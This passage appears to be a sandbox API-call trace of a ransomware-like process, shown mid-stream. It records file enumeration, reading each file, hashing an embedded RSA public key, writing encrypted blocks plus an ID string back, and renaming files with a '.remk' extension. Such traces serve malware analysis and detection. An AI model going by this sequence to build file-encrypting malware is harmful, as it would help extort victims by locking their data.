hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.806] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.806] WriteFile (in: hFile=0x640, lpBuffer=0x37cf820*, nNumberOfBytesToWrite=0x10958, lpNumberOfBytesWritten=0x3adfb14, lpOverlapped=0x0 | out: lpBuffer=0x37cf820*, lpNumberOfBytesWritten=0x3adfb14*=0x10958, lpOverlapped=0x0) returned 1 [0237.807] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37cf820 | out: hHeap=0x630000) returned 1 [0237.807] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x1095d, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.807] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 1 [0237.807] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x60) returned 0x711a38 [0237.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x428) returned 0x325fb40 [0237.807] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", cchWideChar=-1, lpMultiByteStr=0x325fb40, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk", lpUsedDefaultChar=0x0) returned 41 [0237.807] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x430) returned 0x37b5b70 [0237.808] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325fb40 | out: hHeap=0x630000) returned 1 [0237.808] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x711a38 | out: hHeap=0x630000) returned 1 [0237.808] WriteFile (in: hFile=0x640, lpBuffer=0x37b5b70*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x37b5b70*, lpNumberOfBytesWritten=0x3adfb50*=0x28, lpOverlapped=0x0) returned 1 [0237.808] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.808] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0237.808] WriteFile (in: hFile=0x640, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x3adfb50*=0x26, lpOverlapped=0x0) returned 1 [0237.808] CloseHandle (hObject=0x640) returned 1 [0237.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xd0) returned 0x31891a0 [0237.810] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8d0) returned 0x37bd408 [0237.810] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31891a0 | out: hHeap=0x630000) returned 1 [0237.811] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\WGem6pJWFmMLh_CSjVJ.swf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\dcr8wn\\wgem6pjwfmmlh_csjvj.swf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\WGem6pJWFmMLh_CSjVJ.swf.remk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\dcr8wn\\wgem6pjwfmmlh_csjvj.swf.remk")) returned 1 [0237.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bd408 | out: hHeap=0x630000) returned 1 [0237.812] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.812] VirtualFree (lpAddress=0x3c20000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0237.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x3192918 | out: hHeap=0x630000) returned 1 [0237.813] FindNextFileW (in: hFindFile=0x31de130, lpFindFileData=0x3adfba4 | out: lpFindFileData=0x3adfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xb6518370, ftCreationTime.dwHighDateTime=0x1d5d7dc, ftLastAccessTime.dwLowDateTime=0x87de4760, ftLastAccessTime.dwHighDateTime=0x1d5e04e, ftLastWriteTime.dwLowDateTime=0x87de4760, ftLastWriteTime.dwHighDateTime=0x1d5e04e, nFileSizeHigh=0x0, nFileSizeLow=0x14c5c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="XoMJ508kaZydeC8l.flv", cAlternateFileName="XOMJ50~1.FLV")) returned 1 [0237.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xa0) returned 0x37b6810 [0237.813] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xee) returned 0x3192918 [0237.813] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b6810 | out: hHeap=0x630000) returned 1 [0237.813] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\XoMJ508kaZydeC8l.flv") returned=".flv" [0237.813] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\PCPKs0u\\CSFg h-wcbKcac\\xB0W_x\\dcR8Wn\\XoMJ508kaZydeC8l.flv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\pcpks0u\\csfg h-wcbkcac\\xb0w_x\\dcr8wn\\xomj508kazydec8l.flv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x640 [0237.814] GetFileSizeEx (in: hFile=0x640, lpFileSize=0x3adfb40 | out: lpFileSize=0x3adfb40*=85084) returned 1 [0237.814] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3c20000 [0237.817] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x14c36, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.817] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x3adfb78, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb78*=0x26, lpOverlapped=0x0) returned 1 [0237.819] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.819] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.819] SetFilePointer (in: hFile=0x640, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0237.819] ReadFile (in: hFile=0x640, lpBuffer=0x3c20000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x3adfb70, lpOverlapped=0x0 | out: lpBuffer=0x3c20000*, lpNumberOfBytesRead=0x3adfb70*=0x14c5c, lpOverlapped=0x0) returned 1 [0237.821] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.821] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x1f6) returned 0x31c0d08 [0237.821] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.821] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAwdxVEoRJKEq6Zc+IUOh4\\\\nSZTvgM3dE31tl2IhtkUSEcre0ILXT4AiUOX8OtDw9l4SuTTYK8pwrbHa0gQ7EsZs\\\\n\\/XxaW29xuG5Z1OqnM+2sitDrl+pHFYaPNf2cM5\\/WnLAl200OXkLC79l1Fiw9YU\\/Y\\\\nFw0hSW\\/qjak1uCkPHTK4OLYCCTkrI5qwlb5CyHzcL33VHtqw7OFSWT36+19dMApx\\\\njauETTMkx63ow8WEkyxtRMqQTQP5\\/T0hS8wm1EYjqN9TzOx0TimU\\/mvD5MiAct9f\\\\n\\/j7SyUb3YwTsFlJh+HxLYqUXxbT0qyvAeprv0BtlwgYhYFDwM8Xl8\\/NGKiDE5NlR\\\\nzwIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 497 [0237.821] CryptAcquireContextW (in: phProv=0x3adfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x3adfa50*=0x694fd0) returned 1 [0237.822] CryptCreateHash (in: hProv=0x694fd0, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x3adfa58 | out: phHash=0x3adfa58) returned 1 [0237.822] CryptHashData (hHash=0x31de170, pbData=0x31c0d08, dwDataLen=0x1f6, dwFlags=0x0) returned 1 [0237.822] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x0, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x3adfa54) returned 1 [0237.822] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x11) returned 0x31a0f08 [0237.822] CryptGetHashParam (in: hHash=0x31de170, dwParam=0x2, pbData=0x31a0f08, pdwDataLen=0x3adfa54, dwFlags=0x0 | out: pbData=0x31a0f08, pdwDataLen=0x3adfa54) returned 1 [0237.822] GetLastError () returned 0x0 [0237.822] CryptDestroyHash (hHash=0x31de170) returned 1 [0237.822] CryptReleaseContext (hProv=0x694fd0, dwFlags=0x0) returned 1 [0237.822] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0d08 | out: hHeap=0x630000) returned 1 [0237.822] UuidCreate (in: Uuid=0x3adfa48 | out: Uuid=0x3adfa48) returned 0x0 [0237.822] UuidToStringA (in: Uuid=0x3adfa48, StringUuid=0x3adfa40 | out: StringUuid=0x3adfa40) returned 0x0 [0237.822] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.823] RpcStringFreeA (in: String=0x3adfa40 | out: String=0x3adfa40) returned 0x0 [0237.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a58 | out: hHeap=0x630000) returned 1 [0237.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a58 [0237.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14c60) returned 0x37cf820 [0237.823] SetFilePointer (in: hFile=0x640, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0237.823] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a8a90 | out: hHeap=0x630000) returned 1 [0237.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x31c0d08 [0237.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x30) returned 0x31a8a90 [0237.823] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x325fb40 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6930 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf450 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca20 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x40) returned 0x37cf498 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca38 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca68 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcac8 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca80 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x24) returned 0x31ec670 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x158) returned 0x31f7b30 [0237.824] RtlReAllocateHeap (Heap=0x630000, Flags=0x0, Ptr=0x31f7b30, Size=0x218) returned 0x37b1b88 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x558) returned 0x37b5b70 [0237.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca68 | out: hHeap=0x630000) returned 1 [0237.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca80 | out: hHeap=0x630000) returned 1 [0237.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcac8 | out: hHeap=0x630000) returned 1 [0237.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ec670 | out: hHeap=0x630000) returned 1 [0237.824] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcac8 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72feb0 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca80 [0237.824] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ee8 [0237.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x9) returned 0x37bca68 [0237.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fea0 [0237.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10e) returned 0x31c0f10 [0237.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x20) returned 0x31ed738 [0237.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x58) returned 0x31d6990 [0237.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f08 [0237.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x104) returned 0x31f6b30 [0237.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0f28 [0237.825] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fec0 [0237.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31c0f10 | out: hHeap=0x630000) returned 1 [0237.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca80 | out: hHeap=0x630000) returned 1 [0237.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca68 | out: hHeap=0x630000) returned 1 [0237.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ee8 | out: hHeap=0x630000) returned 1 [0237.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcac8 | out: hHeap=0x630000) returned 1 [0237.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31ed738 | out: hHeap=0x630000) returned 1 [0237.825] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31d6930 | out: hHeap=0x630000) returned 1 [0237.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b1b88 | out: hHeap=0x630000) returned 1 [0237.826] GetCurrentThreadId () returned 0x314 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31c0f10 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x82) returned 0x37c6d40 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x2c) returned 0x31a8ac8 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x80) returned 0x694fd0 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x148) returned 0x37bddc8 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fea0 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x65dd10 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.826] GetCurrentThreadId () returned 0x314 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xeb) returned 0x319bc40 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x64) returned 0x7051d8 [0237.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x7051d8 | out: hHeap=0x630000) returned 1 [0237.826] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0237.826] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x319bc40 [0237.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4c) returned 0x31b5808 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72feb0 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x31b6580 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcac8 [0237.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72ff00 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed18 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x68ed28 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f758 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f768 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f778 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca68 [0237.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72ff00 [0237.827] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x72fee0 [0237.827] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f788 [0237.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f798 [0237.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x4) returned 0x325f7a8 [0237.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca80 [0237.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f798 | out: hHeap=0x630000) returned 1 [0237.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ee8 [0237.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f788 | out: hHeap=0x630000) returned 1 [0237.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca50 [0237.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f7a8 | out: hHeap=0x630000) returned 1 [0237.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcae0 [0237.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x72fee0 [0237.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x325f768 | out: hHeap=0x630000) returned 1 [0237.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bcab0 [0237.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fee0 | out: hHeap=0x630000) returned 1 [0237.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca98 [0237.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bcaf8 [0237.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca98 | out: hHeap=0x630000) returned 1 [0237.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10) returned 0x37bca98 [0237.828] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcab0 | out: hHeap=0x630000) returned 1 [0237.828] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x8) returned 0x68ed18 [0237.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72feb0 | out: hHeap=0x630000) returned 1 [0237.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x14) returned 0x31a0ea8 [0237.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed18 | out: hHeap=0x630000) returned 1 [0237.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x18) returned 0x31a0ec8 [0237.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca68 | out: hHeap=0x630000) returned 1 [0237.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0xc) returned 0x37bca68 [0237.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72ff00 | out: hHeap=0x630000) returned 1 [0237.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x204) returned 0x325fd48 [0237.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcac8 | out: hHeap=0x630000) returned 1 [0237.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6e78 [0237.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bcaf8 | out: hHeap=0x630000) returned 1 [0237.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x210) returned 0x37b5b70 [0237.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ec8 | out: hHeap=0x630000) returned 1 [0237.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x10c) returned 0x3195950 [0237.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x68ed28 | out: hHeap=0x630000) returned 1 [0237.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x108) returned 0x31f6c48 [0237.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37bca68 | out: hHeap=0x630000) returned 1 [0237.829] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x200) returned 0x37b5d88 [0237.829] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6e78 | out: hHeap=0x630000) returned 1 [0237.830] RtlAllocateHeap (HeapHandle=0x630000, Flags=0x0, Size=0x100) returned 0x72aea0 [0237.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72fea0 | out: hHeap=0x630000) returned 1 [0237.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x694fd0 | out: hHeap=0x630000) returned 1 [0237.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x319bc40 | out: hHeap=0x630000) returned 1 [0237.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x72aea0 | out: hHeap=0x630000) returned 1 [0237.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31a0ea8 | out: hHeap=0x630000) returned 1 [0237.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x31f6c48 | out: hHeap=0x630000) returned 1 [0237.830] HeapFree (in: hHeap=0x630000, dwFlags=0x0, lpMem=0x37b5b70 | out: hHeap=0x630000) returned 1 [0237.831] SetFilePointerEx (in: hFile=0x640, liDistanceToMove=0x14c5c, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0237.831] WriteFile (in: hFile=0x640, lpBuffer=0x31c0f10*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x3adfb50, lpOverlapped=0x0 | out: lpBuffer=0x31c0f10*, lpNumberOfBytesWritten=0x3adfb50*=0x100, lpOverlapped=0x0) returned 